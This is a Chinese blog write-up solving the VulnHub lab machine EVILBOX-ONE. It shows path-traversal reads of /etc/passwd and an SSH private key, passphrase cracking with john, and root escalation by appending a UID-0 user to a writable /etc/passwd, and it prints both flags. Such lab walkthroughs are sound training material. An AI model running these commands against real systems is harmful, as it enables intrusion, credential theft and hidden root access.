首页 > 其他分享 >『vulnhub系列』EVILBOX-ONE

『vulnhub系列』EVILBOX-ONE

时间:2024-05-28 16:24:38浏览次数:26  
标签:系列 .. passwd rsa EVILBOX 密码 vulnhub root id

『vulnhub系列』EVILBOX-ONE

下载地址:

https://www.vulnhub.com/entry/evilbox-one,736/

信息搜集:

使用nmap探测内网存活主机,发现开启了22 和 80端口

nmap 192.168.0.*

访问80端口web服务,发现apache默认页面

使用dirsearch进行目录爆破

dirsearch -u "http://192.168.0.131"

访问/robots.txt发现一句话,H4x0r 可能是用户名或密码

Hello H4x0r

访问/secret/ 发现是空白,我们来扫描这个目录,发现没有结果

我们可以尝试换个工具和字典

gobuster dir -u "http://192.168.0.131/secret/" -w /usr/share/wordlists/dirb/big.txt -x .php
  • -u 目标url
  • -w wordlist字典
  • -x 文件后缀

不知道为什么使用dirb用同样的字典和指定php爆破不出来

dirsearch -e php -w /usr/share/wordlists/dirb/big.txt -u "http://192.168.0.131/secret/"

最后发现evli.php,但是发现页面还是空的

接下来使用工具ffuf进行爆破参数,最后得到参数为command

ffuf -u 'http://192.168.0.131/secret/evil.php?FUZZ=../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0
  • -fs 0 过滤大小为0
  • FUZZ为字典爆破字段
  • ../../../../etc/passwd因为不确定是命令执行还是任意文件读取,可以用随意命令爆破,和足够多的../../../。。。。/etc/passwd来确定

漏洞利用:

因为刚刚那个,可能是密码,所以我们正好读取/etc/passwd

查看页面源代码,可以换行,发现用户名为mowree

使用mowree来登录H4x0r 为密码,发现登录失败,看来没这么简单,继续使用任意文件读取

众所周知,我们除了使用密码登录ssh以外,还可以使用证书,而证书的私钥一般储存的位置

/home/xxx/.ssh/id_rsaxxx 为用户名,我们使用任意文件读取发现确实存在

command=../../../../home/mowree/.ssh/id_rsa

拷贝下来,使用ssh2john工具将id_rsa转化为john可以是识别的hash

ssh2john id_rsa > hash #将hash值输出到hash文件中

再使用john来破解密码,得到密码unicorn

john hash --wordlist=rockyou.txt #使用wordlist(字典)破解,这里的字典是
#/usr/share/wordlists/里的rockyou需要解压一下

此时使用私钥登录,结果发现有警告,并且需要输入mowree的密码

ssh -i id_rsa [email protected]

原因是,id_rsa的默认权限为700,所以会出现告警。因此我们将id_rsa的权限修改为700

chmod 700 id_rsa

此时登录,输入unicorn 即可登陆成功

提升权限:(passwd提权)

查看所有既有SUID权限的文件,没有发现异常

find / -perm -u=s -type f 2>/dev/null

使用命令查看用户可以以root权限运行的命令,发现没有这个命令

sudo -l

最后发现此用户对/etc/passwd具有写权限,那么这里就可以使用passwd提权

拿root在passwd中的条目依次来看

root:x:0:0:root:/root:/bin/bash
  • root:用户名
  • x:有密码,本来是放加密后的密码的,但后来都放入shadow中了,但也依旧支持此处是加密后的密码
  • 0:用户UID为0
  • 0:用户组GID为0
  • root:用户备注信息
  • /root:用户home目录
  • /bin/bash:用户默认的bash

因此,现在我们在对passwd有写权限后,我们完全构造一个类似的root用户,我们个给passwd追加一个用户,那么现在首要就是生成一个加密后的密码(加盐值),这里使用pyhton来生成

python3 -c 'import crypt;print(crypt.crypt("123456","addsalt"))'

#生成加盐值的密码
adrla7IBSfTZQ

现在我们来构造一个用户

test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash

然后追加到passwd中:

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

查看一下发现添加成功

我们此时切换为test用户看一下,获得root权限

成果:

登录mowree用户后在目录下发现user.txt

56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

获得root权限后,在其目录下发现root.txt

36QtXfdJWvdC0VavlPIApUbDlqTsBM

标签:系列,..,passwd,rsa,EVILBOX,密码,vulnhub,root,id
From: https://www.cnblogs.com/obeto/p/18218257

相关文章

  • SpringBoot系列---【线程池优雅停机,避免消费数据丢数的问题】
    1.问题项目中通过kafka来对接上游,在项目中写一个listener监听topTopic队列,for循环消费records,在for循环中处理成存储到es的对象,一次拉50条,使用自定义线程池esThreadPool异步推送到es中,但是每次停机就会丢数据,例:kafka消费了1000条,但是往es中存储比较慢,优雅停机的时候,esThreadPool......
  • create react app - cra系列比较
    省流版:craco目前还算在更新,其他的已经几年未更新了。虽然react官网已经不推荐cra了,但如果非要用这个系列还是推荐craco吧。GitHub-dilanx/craco:CreateReactAppConfigurationOverride,aneasyandcomprehensibleconfigurationlayerforCreateReactApp.3个月前Gi......
  • LLM 大模型学习必知必会系列(六):量化技术解析、QLoRA技术、量化库介绍使用(AutoGPTQ、A
    LLM大模型学习必知必会系列(六):量化技术解析、QLoRA技术、量化库介绍使用(AutoGPTQ、AutoAWQ)模型的推理过程是一个复杂函数的计算过程,这个计算一般以矩阵乘法为主,也就是涉及到了并行计算。一般来说,单核CPU可以进行的计算种类更多,速度更快,但一般都是单条计算;而显卡能进行的都是基......
  • LLM 大模型学习必知必会系列(七):掌握分布式训练与LoRA/LISA微调:打造高性能大模型的秘
    LLM大模型学习必知必会系列(七):掌握分布式训练与LoRA/LISA微调:打造高性能大模型的秘诀进阶实战指南1.微调(SupervisedFinetuning)指令微调阶段使用了已标注数据。这个阶段训练的数据集数量不会像预训练阶段那么大,最多可以达到几千万条,最少可以达到几百条到几千条。指令微调可以......
  • LLM 大模型学习必知必会系列(四):LLM训练理论篇以及Transformer结构模型详解
    LLM大模型学习必知必会系列(四):LLM训练理论篇以及Transformer结构模型详解1.模型/训练/推理知识介绍深度学习领域所谓的“模型”,是一个复杂的数学公式构成的计算步骤。为了便于理解,我们以一元一次方程为例子解释:y=ax+b该方程意味着给出常数a、b后,可以通过给出的x求出......
  • LLM 大模型学习必知必会系列(三):LLM和多模态模型高效推理实践
    LLM大模型学习必知必会系列(三):LLM和多模态模型高效推理实践1.多模态大模型推理LLM的推理流程:多模态的LLM的原理:代码演示:使用ModelScopeNoteBook完成语言大模型,视觉大模型,音频大模型的推理环境配置与安装以下主要演示的模型推理代码可在魔搭社区免费实例PAI-DSW......
  • cfa三级大神复习经验分享系列(一)
    教材还是Notes?对于愚钝如我之流,建议大家三级一定要看教材。Note很精华很浓缩,我觉得看过教材再看note感觉总结的很精辟,但是Note是以考点列的,而教材像小说一样娓娓道来,有逻辑有情节,如果不follow很难理解,或者说很难吃透里面的很多概念。我这次基本没碰notes,感觉没有大问题。......
  • 【WCH蓝牙系列芯片】-基于CH582开发板—主机连接从机(128bitUUID)实现通信
    -------------------------------------------------------------------------------------------------------------------------------------  在之前一篇主机枚举从机所有服务和特征的博客中,介绍主机连接从机的流程,并且枚举从机的服务,进行通信操作。在本篇博客中,基于CH582......
  • C#开发的应用升级更新服务器端工具 - 开源研究系列文章 - 个人小作品
          笔者开发过一些小应用,然后这些应用就需要有升级更新的功能,但是如果每个都集成进去也行,但是就是得写死更新的代码了。于是就想写一个应用升级更新的管理器,以前看到过Github上有一个AutoUpdate.Net,不过它那个要集成到应用中的,不符合笔者的需求,上次编写的那个没写完,然后......
  • 运维系列:Vscode使用国内镜像源下载,秒下
    Vscode使用国内镜像源下载,秒下Vscode使用国内镜像源下载,秒下镜像源Vscode使用国内镜像源下载,秒下镜像源国内镜像地址:https://vscode.cdn.azure.cn使用方法:很简单,只需要在官网选择自己需要的版本,点击下载,在下载的路径中将我们的镜像源替换上去即可1.81.1版本下......